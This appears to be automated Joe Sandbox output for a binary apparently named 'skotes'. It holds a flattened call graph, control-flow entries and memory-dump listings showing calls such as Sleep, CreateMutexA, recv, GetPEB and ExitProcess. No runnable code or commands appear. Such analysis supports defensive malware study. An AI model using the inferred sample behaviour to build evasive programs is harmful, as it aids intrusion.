10459->10462 10460->10457 10463 fcccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10462->10463 10464 fccfd0 10463->10464 10464->10459 10465 fb3970 10466 fcc68b __Mtx_init_in_situ 2 API calls 10465->10466 10467 fb39a7 10466->10467 10468 fcc68b __Mtx_init_in_situ 2 API calls 10467->10468 10469 fb39e6 10468->10469 9752 fc9ef0 9753 fc9f0c 9752->9753 9756 fcc68b 9753->9756 9755 fc9f17 9759 fcc3d5 9756->9759 9758 fcc69b 9758->9755 9760 fcc3e1 9759->9760 9761 fcc3eb 9759->9761 9762 fcc3be 9760->9762 9764 fcc39e 9760->9764 9761->9758 9772 fccd0a 9762->9772 9764->9761 9768 fcccd5 9764->9768 9766 fcc3d0 9766->9758 9769 fcc3b7 9768->9769 9770 fccce3 InitializeCriticalSectionEx 9768->9770 9769->9758 9770->9769 9773 fccd1f RtlInitializeConditionVariable 9772->9773 9773->9766 10321 fb4276 10322 fb2410 4 API calls 10321->10322 10323 fb427f 10322->10323 10218 fb5cad 10220 fb5caf shared_ptr __cftof 10218->10220 10219 fb5d17 shared_ptr __floor_pentium4 10220->10219 10221 fb5c10 3 API calls 10220->10221 10222 fb66ac 10221->10222 10223 fb5c10 3 API calls 10222->10223 10224 fb66b1 10223->10224 10225 fb22c0 3 API calls 10224->10225 10226 fb66c9 shared_ptr 10225->10226 10227 fb5c10 3 API calls 10226->10227 10228 fb673d 10227->10228 10229 fb22c0 3 API calls 10228->10229 10231 fb6757 shared_ptr 10229->10231 10230 fb5c10 3 API calls 10230->10231 10231->10230 10232 fb22c0 3 API calls 10231->10232 10233 fb6852 shared_ptr __floor_pentium4 10231->10233 10232->10231 9731 fe6629 9734 fe64c7 9731->9734 9735 fe64d5 __cftof 9734->9735 9736 fe6520 9735->9736 9739 fe652b 9735->9739 9738 fe652a 9745 fea302 GetPEB 9739->9745 9741 fe6535 9742 fe654a __cftof 9741->9742 9743 fe653a GetPEB 9741->9743 9744 fe6562 ExitProcess 9742->9744 9743->9742 9746 fea31c __cftof 9745->9746 9746->9741 10234 fb20a0 10235 fcc68b __Mtx_init_in_situ 2 API calls 10234->10235 10236 fb20ac 10235->10236 10358 fb3fe0 10359 fb4022 10358->10359 10360 fb408c 10359->10360 10361 fb40d2 10359->10361 10364 fb4035 __floor_pentium4 10359->10364 10365 fb35e0 10360->10365 10371 fb3ee0 10361->10371 10366 fb3616 10365->10366 10370 fb364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10366->10370 10377 fb2ce0 10366->10377 10368 fb369e 10368->10370 10386 fb2c00 10368->10386 10370->10364 10372 fb3f48 10371->10372 10374 fb3f1e 10371->10374 10373 fb2c00 3 API calls 10372->10373 10376 fb3f58 10372->10376 10375 fb3f7f 10373->10375 10374->10364 10375->10364 10376->10364 10378 fb2d1d 10377->10378 10379 fcbedf InitOnceExecuteOnce 10378->10379 10380 fb2d46 10379->10380 10381 fb2d51 __floor_pentium4 10380->10381 10382 fb2d88 10380->10382 10393 fcbef7 10380->10393 10381->10368 10384 fb2440 3 API calls 10382->10384 10385 fb2d9b 10384->10385 10385->10368 10387 fb2c0e 10386->10387 10406 fcb847 10387->10406 10389 fb2c42 10390 fb2c49 10389->10390 10412 fb2c80 10389->10412 10390->10370 10392 fb2c58 std::_Throw_future_error 10394 fcbf03 std::_Throw_future_error 10393->10394 10395 fcbf6a 10394->10395 10396 fcbf73 10394->10396 10400 fcbe7f 10395->10400 10397 fb2ae0 4 API calls 10396->10397 10399 fcbf6f 10397->10399 10399->10382 10401 fccc31 InitOnceExecuteOnce 10400->10401 10402 fcbe97 10401->10402 10403 fcbe9e 10402->10403 10404 fe6cbb 3 API calls 10402->10404 10403->10399 10405 fcbea7 10404->10405 10405->10399 10407 fcb854 10406->10407 10411 fcb873 Concurrency::details::_Reschedule_chore 10406->10411 10415 fccb77 10407->10415 10409 fcb864 10409->10411 10417 fcb81e 10409->10417 10411->10389 10423 fcb7fb 10412->10423 10414 fb2cb2 shared_ptr 10414->10392 10416 fccb92 CreateThreadpoolWork 10415->10416 10416->10409 10418 fcb827 Concurrency::details::_Reschedule_chore 10417->10418 10421 fccdcc 10418->10421 10420 fcb841 10420->10411 10422 fccde1 TpPostWork 10421->10422 10422->10420 10424 fcb817 10423->10424 10425 fcb807 10423->10425 10424->10414 10425->10424 10427 fcca78 10425->10427 10428 fcca8d TpReleaseWork 10427->10428 10428->10424 10523 fb4120 10524 fb416a 10523->10524 10525 fb3ee0 3 API calls 10524->10525 10526 fb41b2 __floor_pentium4 10524->10526 10525->10526 10437 fb9ba5 10438 fb9ba7 10437->10438 10439 fb5c10 3 API calls 10438->10439 10440 fb9cb1 10439->10440 10441 fb8b30 3 API calls 10440->10441 10442 fb9cc2 10441->10442 10486 fb215a 10487 fcc6fc InitializeCriticalSectionEx 10486->10487 10488 fb2164 10487->10488 10443 fb3f9f 10444 fb3fad 10443->10444 10446 fb3fb6 10443->10446 10445 fb2410 4 API calls 10444->10445 10445->10446 9774 fb9adc 9777 fb9aea shared_ptr 9774->9777 9775 fba917 9776 fba953 Sleep CreateMutexA 9775->9776 9778 fba98e 9776->9778 9777->9775 9779 fb9b4b shared_ptr 9777->9779 9781 fb9b59 9779->9781 9789 fb5c10 9779->9789 9782 fb9b7c 9807 fb8b30 9782->9807 9784 fb9b8d 9785 fb5c10 3 API calls 9784->9785 9786 fb9cb1 9785->9786 9787 fb8b30 3 API calls 9786->9787 9788 fb9cc2 9787->9788 9790 fb5c54 9789->9790 9817 fb4b30 9790->9817 9792 fb5d17 shared_ptr __floor_pentium4 9792->9782 9793 fb5c7b shared_ptr __cftof 9793->9792 9794 fb5c10 3 API calls 9793->9794 9795 fb66ac 9794->9795 9796 fb5c10 3 API calls 9795->9796 9797 fb66b1 9796->9797 9821 fb22c0 9797->9821 9799 fb66c9 shared_ptr 9800 fb5c10 3 API calls 9799->9800 9801 fb673d 9800->9801 9802 fb22c0 3 API calls 9801->9802 9804 fb6757 shared_ptr 9802->9804 9803 fb5c10 3 API calls 9803->9804 9804->9803 9805 fb22c0 3 API calls 9804->9805 9806 fb6852 shared_ptr __floor_pentium4 9804->9806 9805->9804 9806->9782 9808 fb8b7c 9807->9808 9809 fb5c10 3 API calls 9808->9809 9811 fb8b97 shared_ptr 9809->9811 9810 fb8d01 shared_ptr __floor_pentium4 9810->9784 9811->9810 9812 fb5c10 3 API calls 9811->9812 9814 fb8d9a shared_ptr 9812->9814 9813 fb8e7e shared_ptr __floor_pentium4 9813->9784 9814->9813 9815 fb5c10 3 API calls 9814->9815 9816 fb8f1a shared_ptr __floor_pentium4 9815->9816 9816->9784 9818 fb4ce5 9817->9818 9820 fb4b92 9817->9820 9818->9793 9820->9818 9824 fe6da6 9820->9824 9941 fb2280 9821->9941 9825 fe6db4 9824->9825 9826 fe6dc2 9824->9826 9829 fe6d19 9825->9829 9826->9820 9834 fe690a 9829->9834 9833 fe6d3d 9833->9820 9835 fe692a 9834->9835 9841 fe6921 9834->9841 9835->9841 9848 fea671 9835->9848 9842 fe6d52 9841->9842 9843 fe6d8f 9842->9843 9845 fe6d5f 9842->9845 9933 feb67d 9843->9933 9846 fe6d6e 9845->9846 9928 feb6a1 9845->9928 9846->9833 9852 fea67b __dosmaperr __freea 9848->9852 9849 fe694a 9853 feb5fb 9849->9853 9852->9849 9861 fe8bec 9852->9861 9854 feb60e 9853->9854 9856 fe6960 9853->9856 9854->9856 9887 fef5ab 9854->9887 9857 feb628 9856->9857 9858 feb63b 9857->9858 9860 feb650 9857->9860 9858->9860 9894 fee6b1 9858->9894 9860->9841 9862 fe8bf1 __cftof 9861->9862 9863 fe8bfc __cftof 9862->9863 9867 fed634 9862->9867 9881 fe65ed 9863->9881 9868 fed640 __cftof __dosmaperr 9867->9868 9869 fed69c __cftof __dosmaperr 9868->9869 9870 fed81b __dosmaperr 9868->9870 9871 fed726 9868->9871 9872 fed751 __cftof 9868->9872 9869->9863 9873 fe65ed __cftof 3 API calls 9870->9873 9871->9872 9884 fed62b 9871->9884 9872->9869 9876 fea671 __cftof 3 API calls 9872->9876 9879 fed7a5 9872->9879 9875 fed82e 9873->9875 9876->9879 9878 fed62b __cftof 3 API calls 9878->9872 9879->9869 9880 fea671 __cftof 3 API calls 9879->9880 9880->9869 9882 fe64c7 __cftof 3 API calls 9881->9882 9883 fe65fe 9882->9883 9885 fea671 __cftof 3 API calls 9884->9885 9886 fed630 9885->9886 9886->9878 9888 fef5b7 __dosmaperr 9887->9888 9889 fea671 __cftof 3 API calls 9888->9889 9891 fef5c0 __cftof __dosmaperr 9889->9891 9890 fef606 9890->9856 9891->9890 9892 fe8bec __cftof 3 API calls 9891->9892 9893 fef62b 9892->9893 9895 fea671 __cftof 3 API calls 9894->9895 9896 fee6bb 9895->9896 9899 fee5c9 9896->9899 9898 fee6c1 9898->9860 9903 fee5d5 __cftof __dosmaperr __freea 9899->9903 9900 fee5f6 9900->9898 9901 fe8bec __cftof 3 API calls 9902 fee668 9901->9902 9904 fee6a4 9902->9904 9908 fea72e 9902->9908 9903->9900 9903->9901 9904->9898 9909 fea739 __dosmaperr __freea 9908->9909 9910 fe8bec __cftof 3 API calls 9909->9910 9912 fea7be 9909->9912 9911 fea7c7 9910->9911 9913 fee4b0 9912->9913 9914 fee5c9 __cftof 3 API calls 9913->9914 9915 fee4c3 9914->9915 9920 fee259 9915->9920 9917 fee4cb __cftof 9919 fee4dc __cftof __dosmaperr __freea 9917->9919 9923 fee6c4 9917->9923 9919->9904 9921 fe690a __cftof GetPEB ExitProcess GetPEB 9920->9921 9922 fee26b 9921->9922 9922->9917 9924 fee259 __cftof GetPEB ExitProcess GetPEB 9923->9924 9927 fee6e4 __cftof 9924->9927 9925 fee75a __cftof __floor_pentium4 9925->9919 9926 fee32f __cftof GetPEB ExitProcess GetPEB 9926->9925 9927->9925 9927->9926 9929 fe690a __cftof 3 API calls 9928->9929 9930 feb6be 9929->9930 9932 feb6ce __floor_pentium4 9930->9932 9938 fef1bf 9930->9938 9932->9846 9934 fea671 __cftof 3 API calls 9933->9934 9935 feb688 9934->9935 9936 feb5fb __cftof 3 API calls 9935->9936 9937 feb698 9936->9937 9937->9846 9939 fe690a __cftof 3 API calls 9938->9939 9940 fef1df __cftof __freea __floor_pentium4 9939->9940 9940->9932 9942 fb2296 9941->9942 9945 fe87f8 9942->9945 9948 fe7609 9945->9948 9947 fb22a4 9947->9799 9949 fe7649 9948->9949 9953 fe7631 __cftof __dosmaperr __floor_pentium4 9948->9953 9950 fe690a __cftof 3 API calls 9949->9950 9949->9953 9951 fe7661 9950->9951 9954 fe7bc4 9951->9954 9953->9947 9956 fe7bd5 9954->9956 9955 fe7be4 __cftof __dosmaperr 9955->9953 9956->9955 9961 fe8168 9956->9961 9966 fe7dc2 9956->9966 9971 fe7de8 9956->9971 9981 fe7f36 9956->9981 9962 fe8178 9961->9962 9963 fe8171 9961->9963 9962->9956 9990 fe7b50 9963->9990 9965 fe8177 9965->9956 9967 fe7dcb 9966->9967 9968 fe7dd2 9966->9968 9969 fe7b50 3 API calls 9967->9969 9968->9956 9970 fe7dd1 9969->9970 9970->9956 9972 fe7e09 __cftof __dosmaperr 9971->9972 9973 fe7def 9971->9973 9972->9956 9973->9972 9974 fe7f69 9973->9974 9976 fe7fa2 9973->9976 9979 fe7f77 9973->9979 9977 fe7f8b 9974->9977 9974->9979 10008 fe8241 9974->10008 9976->9977 10004 fe8390 9976->10004 9977->9956 9979->9977 10012 fe86ea 9979->10012 9982 fe7f4f 9981->9982 9983 fe7f69 9981->9983 9982->9983 9984 fe7fa2 9982->9984 9988 fe7f77 9982->9988 9985 fe8241 3 API calls 9983->9985 9983->9988 9989 fe7f8b 9983->9989 9986 fe8390 3 API calls 9984->9986 9984->9989 9985->9988 9986->9988 9987 fe86ea 3 API calls 9987->9989 9988->9987 9988->9989 9989->9956 9992 fe7b62 __dosmaperr 9990->9992 9994 fe8ab6 9992->9994 9993 fe7b85 __dosmaperr 9993->9965 9995 fe8ad1 9994->9995 9998 fe8868 9995->9998 9997 fe8adb 9997->9993 9999 fe887a 9998->9999 10000 fe690a __cftof GetPEB ExitProcess GetPEB 9999->10000 10003 fe888f __cftof __dosmaperr 9999->10003 10002 fe88bf 10000->10002 10001 fe6d52 GetPEB ExitProcess GetPEB 10001->10002 10002->10001 10002->10003 10003->9997 10005 fe83ab 10004->10005 10006 fe83dd 10005->10006 10016 fec88e 10005->10016 10006->9979 10009 fe825a 10008->10009 10023 fed3c8 10009->10023 10011 fe830d 10011->9979 10011->10011 10013 fe875d __floor_pentium4 10012->10013 10015 fe8707 10012->10015 10013->9977 10014 fec88e __cftof 3 API calls 10014->10015 10015->10013 10015->10014 10019 fec733 10016->10019 10018 fec8a6 10018->10006 10020 fec743 10019->10020 10021 fe690a __cftof GetPEB ExitProcess GetPEB 10020->10021 10022 fec748 __cftof __dosmaperr 10020->10022 10021->10022 10022->10018 10024 fed3d8 __cftof __dosmaperr 10023->10024 10025 fed3ee 10023->10025 10024->10011 10025->10024 10026 fed485 10025->10026 10027 fed48a 10025->10027 10029 fed4ae 10026->10029 10030 fed4e4 10026->10030 10036 fecbdf 10027->10036 10032 fed4cc 10029->10032 10033 fed4b3 10029->10033 10053 fecef8 10030->10053 10049 fed0e2 10032->10049 10042 fed23e 10033->10042 10037 fecbf1 10036->10037 10038 fe690a __cftof GetPEB ExitProcess GetPEB 10037->10038 10039 fecc05 10038->10039 10040 fecc0d __alldvrm __cftof __dosmaperr _strrchr 10039->10040 10041 fecef8 GetPEB ExitProcess GetPEB 10039->10041 10040->10024 10041->10040 10043 fed26c 10042->10043 10044 fed2de 10043->10044 10046 fed2b7 10043->10046 10047 fed2a5 10043->10047 10045 fecf9a GetPEB ExitProcess GetPEB 10044->10045 10045->10047 10048 fed16d GetPEB ExitProcess GetPEB 10046->10048 10047->10024 10048->10047 10050 fed10f 10049->10050 10051 fed14e 10050->10051 10052 fed16d GetPEB ExitProcess GetPEB 10050->10052 10051->10024 10052->10051 10054 fecf10 10053->10054 10055 fecf75 10054->10055 10056 fecf9a GetPEB ExitProcess GetPEB 10054->10056 10055->10024 10056->10055 10447 fb2b90 10448 fb2bce 10447->10448 10449 fcb7fb TpReleaseWork 10448->10449 10450 fb2bdb shared_ptr __floor_pentium4 10449->10450 10527 fb2b10 10528 fb2b1a 10527->10528 10529 fb2b1c 10527->10529 10530 fcc26a 4 API calls 10529->10530 10531 fb2b22 10530->10531 9747 fba856 9749 fba870 9747->9749 9750 fba892 shared_ptr 9747->9750 9748 fba953 Sleep CreateMutexA 9751 fba98e 9748->9751 9749->9748 9749->9750 10532 fcd111 10533 fcd122 10532->10533 10534 fcd12a 10533->10534 10536 fcd199 10533->10536 10537 fcd1a7 SleepConditionVariableCS 10536->10537 10539 fcd1c0 10536->10539 10537->10539 10539->10533 10237 fb3c8e 10238 fb3c98 10237->10238 10240 fb3ca5 10238->10240 10245 fb2410 10238->10245 10241 fb3810 3 API calls 10240->10241 10242 fb3ccf 10241->10242 10243 fb3810 3 API calls 10242->10243 10244 fb3cdb shared_ptr 10243->10244 10246 fb2424 10245->10246 10249 fcb52d 10246->10249 10257 fe3aed 10249->10257 10251 fb242a 10251->10240 10252 fcb5a5 ___std_exception_copy 10264 fcb1ad 10252->10264 10253 fcb598 10260 fcaf56 10253->10260 10268 fe4f29 10257->10268 10259 fcb555 10259->10251 10259->10252 10259->10253 10261 fcaf9f ___std_exception_copy 10260->10261 10263 fcafb2 shared_ptr 10261->10263 10274 fcb39f 10261->10274 10263->10251 10265 fcb1d8 10264->10265 10267 fcb1e1 shared_ptr 10264->10267 10266 fcb39f 4 API calls 10265->10266 10266->10267 10267->10251 10269 fe4f2e __cftof 10268->10269 10269->10259 10270 fed634 __cftof 3 API calls 10269->10270 10273 fe8bfc __cftof 10269->10273 10270->10273 10271 fe65ed __cftof 3 API calls 10272 fe8c2f 10271->10272 10273->10271 10275 fcbedf InitOnceExecuteOnce 10274->10275 10276 fcb3e1 10275->10276 10277 fcb3e8 10276->10277 10285 fe6cbb 10276->10285 10277->10263 10286 fe6cc7 __dosmaperr 10285->10286 10287 fea671 __cftof 3 API calls 10286->10287 10290 fe6ccc 10287->10290 10288 fe8bec __cftof 3 API calls 10289 fe6cf6 10288->10289 10290->10288 10324 fe6a44 10325 fe6a5c 10324->10325 10326 fe6a52 10324->10326 10329 fe698d 10325->10329 10328 fe6a76 __freea 10330 fe690a __cftof 3 API calls 10329->10330 10331 fe699f 10330->10331 10331->10328 10060 fb2ec0 10061 fb2f06 10060->10061 10065 fb2f6f 10060->10065 10094 fcc6ac 10061->10094 10064 fb2fef 10065->10064 10071 fcc6ac GetSystemTimePreciseAsFileTime 10065->10071 10066 fb301e 10097 fcc26a 10066->10097 10068 fb3024 10069 fcc26a 4 API calls 10068->10069 10072 fb2fb9 10069->10072 10070 fb2f1d __Mtx_unlock 10070->10065 10070->10068 10071->10072 10073 fcc26a 4 API calls 10072->10073 10074 fb2fc0 __Mtx_unlock 10072->10074 10073->10074 10075 fcc26a 4 API calls 10074->10075 10076 fb2fd8 __Cnd_broadcast 10074->10076 10075->10076 10076->10064 10077 fcc26a 4 API calls 10076->10077 10078 fb303c 10077->10078 10079 fcc6ac GetSystemTimePreciseAsFileTime 10078->10079 10080 fb3080 shared_ptr __Mtx_unlock 10079->10080 10081 fb31c5 10080->10081 10083 fb31cb 10080->10083 10087 fb31a7 __floor_pentium4 10080->10087 10090 fcc6ac GetSystemTimePreciseAsFileTime 10080->10090 10082 fcc26a 4 API calls 10081->10082 10082->10083 10084 fcc26a 4 API calls 10083->10084 10085 fb31d1 10084->10085 10086 fcc26a 4 API calls 10085->10086 10091 fb3193 __Mtx_unlock 10086->10091 10088 fcc26a 4 API calls 10089 fb31dd 10088->10089 10092 fb315f 10090->10092 10091->10087 10091->10088 10092->10081 10092->10085 10092->10091 10101 fcbd4c 10092->10101 10104 fcc452 10094->10104 10096 fb2f12 10096->10066 10096->10070 10098 fcc292 10097->10098 10100 fcc274 10097->10100 10098->10098 10100->10098 10121 fcc297 10100->10121 10138 fcbb72 10101->10138 10103 fcbd5c 10103->10092 10105 fcc4a8 10104->10105 10107 fcc47a __floor_pentium4 10104->10107 10105->10107 10110 fccf6b 10105->10110 10107->10096 10108 fcc4fd __Xtime_diff_to_millis2 10108->10107 10109 fccf6b _xtime_get GetSystemTimePreciseAsFileTime 10108->10109 10109->10108 10111 fccf7a 10110->10111 10113 fccf87 __aulldvrm 10110->10113 10111->10113 10114 fccf44 10111->10114 10113->10108 10117 fccbea 10114->10117 10118 fccbfb GetSystemTimePreciseAsFileTime 10117->10118 10119 fccc07 10117->10119 10118->10119 10119->10113 10124 fb2ae0 10121->10124 10123 fcc2ae std::_Throw_future_error 10131 fcbedf 10124->10131 10126 fb2af4 __dosmaperr 10126->10123 10127 fea671 __cftof 3 API calls 10126->10127 10130 fe6ccc 10127->10130 10128 fe8bec __cftof 3 API calls 10129 fe6cf6 10128->10129 10130->10128 10134 fccc31 10131->10134 10135 fccc3f InitOnceExecuteOnce 10134->10135 10137 fcbef2 10134->10137 10135->10137 10137->10126 10139 fcbb9c 10138->10139 10140 fccf6b _xtime_get GetSystemTimePreciseAsFileTime 10139->10140 10141 fcbba4 __Xtime_diff_to_millis2 __floor_pentium4 10139->10141 10142 fcbbcf __Xtime_diff_to_millis2 10140->10142 10141->10103 10142->10141 10143 fccf6b _xtime_get GetSystemTimePreciseAsFileTime 10142->10143 10143->10141 10144 fcd0c7 10145 fcd0d7 10144->10145 10146 fcd17f 10145->10146 10147 fcd17b RtlWakeAllConditionVariable 10145->10147 10148 fbe0c0 recv 10149 fbe122 recv 10148->10149 10150 fbe157 recv 10149->10150 10152 fbe191 10150->10152 10151 fbe2b3 __floor_pentium4 10152->10151 10153 fcc6ac GetSystemTimePreciseAsFileTime 10152->10153 10154 fbe2ee 10153->10154 10155 fcc26a 4 API calls 10154->10155 10156 fbe358 10155->10156 10344 fb2e00 10345 fb2e28 10344->10345 10346 fcc68b __Mtx_init_in_situ 2 API calls 10345->10346 10347 fb2e33 10346->10347 10451 fb8980 10453 fb89d8 shared_ptr 10451->10453 10454 fb8aea 10451->10454 10452 fb5c10 3 API calls 10452->10453 10453->10452 10453->10454 10332 fb3c47 10333 fb3c51 10332->10333 10335 fb32d0 5 API calls 10333->10335 10336 fb3c5f 10333->10336 10334 fb3c68 10335->10336 10336->10334 10337 fb3810 3 API calls 10336->10337 10338 fb3cdb shared_ptr 10337->10338 10499 fb9f44 10501 fb9f4c shared_ptr 10499->10501 10500 fba953 Sleep CreateMutexA 10502 fba98e 10500->10502 10501->10500 10503 fba01f shared_ptr 10501->10503

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 351 fe652b-fe6538 call fea302 354 fe655a-fe656c call fe656d ExitProcess 351->354 355 fe653a-fe6548 GetPEB 351->355 355->354 357 fe654a-fe6559 355->357 357->354
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,00FE652A,?,?,?,?,?,00FE7661), ref: 00FE6566
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                          • Opcode ID: dc44ea5107d0f5be1b68af202479753b839599ea590289e1c536691116678947
                                                                                                                                                                                                                                                                                          • Instruction ID: 8b81e0e8258ab9ac2ea5e5c2953c6876973cc9361d817f15d2a50789cd96e0d1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc44ea5107d0f5be1b68af202479753b839599ea590289e1c536691116678947
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E0863124128CAEDE357B1ACD1D98C3B19EB51790F044415F9088A121CB39ED51E980

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
